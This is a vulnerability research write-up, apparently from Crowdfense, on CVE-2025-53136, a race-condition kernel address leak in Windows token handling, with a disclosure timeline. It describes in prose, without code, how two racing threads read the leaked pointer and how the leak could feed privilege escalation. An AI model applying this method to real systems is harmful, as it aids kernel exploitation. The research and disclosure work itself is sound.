NT OS Kernel Information Disclosure Vulnerability – CVE-2025-53136 Date: September 11, 2025 Authors: hieu.q, voidsec Source: Crowdfense - Vulnerability Research Hub --- Introduction Microsoft enhanced security in Windows 11/Windows Server 2022 24H2 by restricting kernel base address disclosures in system calls like NtQuerySystemInformation() with SystemModuleInformation class unless the caller had SeDebugPrivilege. This mitigated common Kernel Address Space Layout Randomization (KASLR) bypasses that made exploitation easier. During patch analysis for CVE-2024-43511, researchers identified a new kernel information leak vulnerability caused by a mistake in the patch. The bug involves a race condition that leaks kernel addresses tied to token handles, facilitating exploitation chains for privilege escalation on updated Windows versions. --- Vulnerability Details Quick Review on CVE-2024-43511 Patch October 2024: Microsoft patched a TOCTOU (Time-of-check to Time-of-use) race condition in the Windows kernel (CVE-2024-43511). The fix involves the RtlSidHashInitialize() function, which now reads a pointer from a kernel-side TOKEN structure instead of trusting user input. Bug Description RtlSidHashInitialize() takes as the first parameter a pointer from the TOKEN structure. It stores this kernel pointer (pointing to UserAndGroups inside the token) into a user-controlled buffer as its third parameter. Although the pointer is later replaced, a race condition opens a small window where this leaked kernel address can be read from user space. Triggering the bug requires calling NtQuerySystemInformation() with the SystemTokenInformation class. Effects This leak is especially valuable for Windows 24H2 and later, where traditional kernel address leaks are patched. Since the bug exists in an NT syscall, it can be exploited from low integrity levels (Low IL) or AppContainer sandboxes. When combined with a write-what-where bug (e.g., overwriting Privileges inside a TOKEN object), it can achieve full local privilege escalation. --- Exploitation Setup Exploitation involves two concurrent threads: One thread repeatedly reads the user buffer at the offset where the leaked pointer is stored. Another thread makes numerous calls to NtQuerySystemInformation() to trigger the race condition and leak the address. Reliability The race condition window is large enough for reliable kernel address reading. Frequent syscall invocations and concurrent reads ensure high success rates in obtaining the leaked kernel address nearly every time. Proof-of-Concept Demonstrated on a Windows Insider Preview build from April 2025. Exploits work from both Low IL and AppContainer contexts. Screenshots shared show successful kernel address leaks under both contexts. --- Conclusion Patch analysis is crucial for discovering new vulnerabilities and understanding how patches might inadvertently introduce bugs. Developers and researchers should carefully analyze patch implementations to ensure no residual flaws remain. Changes to security-critical functions must consider indirect effects on other parts of the system to prevent new vulnerabilities. Understanding how a function is used before altering it is essential to maintain system security and prevent mistakes. --- Disclosure Timeline April 8, 2025: Vulnerability reported to Microsoft. April 9, 2025: Microsoft acknowledges investigation. April 22, 2025: Microsoft closed the case, citing bug duplication; researcher raised issue publicly on X (Twitter). April 25, 2025: Validity of the bug confirmed by Microsoft. April 29, 2025: Microsoft confirms the bug is in scope. August 1, 2025: CVE-2025-53136 officially assigned. --- Additional Information The vulnerability leverages a race condition in kernel token data handling